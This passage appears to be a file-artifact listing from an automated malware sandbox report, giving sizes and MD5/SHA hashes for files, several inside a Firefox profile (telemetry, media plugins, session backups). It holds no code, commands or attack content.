MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
1.7MB
MD5c7901bd93db80072751e0bbc88cf2bc3
SHA1611830be770290b0058f71a14ac81de635d2cc10
SHA2561dbe8bcb5469c4810154570f2feaafb1a887bdc1aa97c6cdddb68f1d9499d6f7
SHA5127e37023e41d5bf0e4e83ef84c131c996a174c120223afaee16b8be671d4fbdf6f3e7e7f660f3b6e73a78597ca9f3af31ecc1cd48bff08632a1167630bb5b2e49
-
Filesize
4.9MB
MD5789b79d122173221ba3b85c7b08002e4
SHA153e2ff13b7a76fc6090e5247b49e6e9828c419a1
SHA256d3192eae45cef7e5ac18e9c5bfdc88ea27815a27b9b5619fb75853e20361e576
SHA512b72de5178fc6a1e90c8b7de12023b1e1b7bdeeabaf8875d0543f976c86653d088f3b13712fae8bbe2024c46b0853b6d7670bc0205ca9b3a5d5cffe143f0aab0c
-
Filesize
948KB
MD5454eb5ad9da9d9a48dde6b5aaee0796f
SHA104791cb58b53f1cab386858acd545583f3233b7c
SHA2565195df1106599d81f62e9a30ad995725c4d90403541601aeadee75e47cbf45cf
SHA512bea2e0f222427f80fbca8967ec40599f0bfd7f2f304349cba255f69f7ad2742021f36c66c70203a3309b66af89a86292393cdbb7e0c9232468c7bd8c534ededa
-
Filesize
2.6MB
MD55c31c87a24fa448bb5c97a88f3442510
SHA16927671950c0ec1d33e1d94c5d8ee3d8ef906c7b
SHA25669767c62c9e48334a6ddffffb0fc21dac94466f34006a08caa11440e0e54682d
SHA5127c0139fcfd036df1b8f2b62cb1479baad2671759621c276e87fd50e37c5bb53de18a3b1e64dac4539c6d0aa9feff01cc2cfef05d166008a6c337400be7ea9f0d
-
Filesize
1.8MB
MD5a93b02d857db3b12c32bd765b83825ab
SHA1137f12047a081e6581e1d1a83c939d98514c3ff3
SHA256553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa
SHA512aab2bfd4090c77b87784d0110f5ee2dd24554fada9bdf9c2e8e08ff01a9025f5d8a7dfa2d4b89bf35cb037c162292a04f1084b87727b1bd201a9b5ab1b367bcd
-
Filesize
442KB
MD585430baed3398695717b0263807cf97c
SHA1fffbee923cea216f50fce5d54219a188a5100f41
SHA256a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA51206511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize
8.0MB
MD5a01c5ecd6108350ae23d2cddf0e77c17
SHA1c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\db\data.safe.bin
Filesize9KB
MD5e5dc959214b9dd501fa3e098e719c415
SHA1ab22cca6b322fbbfe5c3d2c4ca4ce3618bca4a52
SHA2565941c50243713c9967d518324e958f4eed3659b4ca586eb4ee1e00ee4993d176
SHA5122233a63c3cd494db71768a4455738cde3a9a67062fa6b9b6b5adb6eef7b4e1db0835394ba101762ef26c149bc3095fbc5c456ccffb5a80c3d9e534faf5b310b9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\db\data.safe.bin
Filesize9KB
MD5d96fdd823b1a28a0ae3bfd0923253251
SHA1e778b48ff952f8222f661b7dd60193bcb6cd3a7c
SHA256c6faebc67e4176bdfeca30dba74844c6e2e72f51b42d0c11f56f2c20314d5173
SHA512e9a3846ac6d8360b06f615a3485e4906291ecf64a6a6b311df773e3342d223fe6794d686b39c7baad754b301ef0e4060ee8d25eb2c350e31d72b48d239edc1a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\47ed02a4-0213-4b7d-aca4-e04ca3a8c7b6
Filesize733B
MD525fdfa8579cb76bfc0649dd6bbddc397
SHA14494e4de59dfb874dbe4f0259e671740536dad60
SHA256cb3581f2ca50df8525afefa132147fa2b3d63feebafa4ebf74666ce46b6c97f7
SHA51275fcdbfe6cc3cf1e95f36744869731954017297169ccb288554a17fc8ed3fa5a39ed9a0fe9a9f4a7b27833325d801766a7ce6fac6ad7742f429f12163cdf7d7d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize372B
MD58be33af717bb1b67fbd61c3f4b807e9e
SHA17cf17656d174d951957ff36810e874a134dd49e0
SHA256e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA5126125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize11.8MB
MD533bf7b0439480effb9fb212efce87b13
SHA1cee50f2745edc6dc291887b6075ca64d716f495a
SHA2568ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize1KB
MD5937326fead5fd401f6cca9118bd9ade9
SHA14526a57d4ae14ed29b37632c72aef3c408189d91
SHA25668a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize
7KB
MD549438ddf6d77f0fe197831347b3eabaf
SHA11ab822ae405baa57e133b2510af38c520bb0811d
SHA256dc5881629f0b7d7ef8f781f8d3a84a69203e7e12c38d37b6a809d9fc01d0a948
SHA512ca9c99265617f8b3589ab86fc46cab5056d34697f7dd361a653a22c5c2bfc02bf45e8bbc1ec82eb0cbf5b07dd52783b2b22cf246087f82eea04d2586f4375916
-
Filesize
7KB
MD52c38024e8f9b16cf341cf764d179b0de
SHA1cc3b021903bd21e6f66d0bd45a77867f7aef519a
SHA256f31638fb71c1b759dd97d55deafb6868ae5a19226b10337591755b5a178f672d
SHA5128b1775eaf73289a6bdbe14d848ae1a768dfa05c27413a41ed19ffffbc1fa9ece2c808b2cb289ca2308bb57fe01faf8dedc3cdd80c32c77147f0184587b08f380
-
Filesize
6KB
MD5fa0d927cef00a33e5fa4f63f7f2eff50
SHA14d86bb4f49969d16bc0cbf3dbe07caf889c329de
SHA256da5b547890299e50cfc5f7ac43d2e0d1a43b4e08a07e3dadb16debc36bca838a
SHA5120841e61b8d990be083577ea3180ecf96e0eb684aae3c5c46a2848a0a398f2684f69a37c410f5dcfbb0bbbd00fc1032998eb436bf97748d8317926379f37a979a
-
Filesize
6KB
MD5b113bbde27c8ad0f196019593969cb84
SHA144b463a636143142e2146d111de3e4cc32918b8b
SHA256d6cecc3f36da4f174233861280459d8f7895f2732f9df0af3817bbf2b282d2b6
SHA512acd2d73d1ff66638619171ceaa9954611e26837829582c31d04fe7039ccf2c6c906993b919f414a6e71f879371437e02ca33a3a674230703bf618de19b6f19e5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5c2ff0ba2baab4dcc4155092bef83032e
SHA111444997f2d0506eb97f997d0a31cf231f62df88
SHA256c899647873aa580048d64f853465928b6fd5a491822a916d2bb95ca96f14fc8c
SHA512533128b0381d8bb6ddc3d45c21f5f5cf083ca36a5b84ae77a7ac588b897f086a80e23c06b51b3a2a4361b2f9ceb87dd7fddc97edfb42b6b193a25161ad44b39c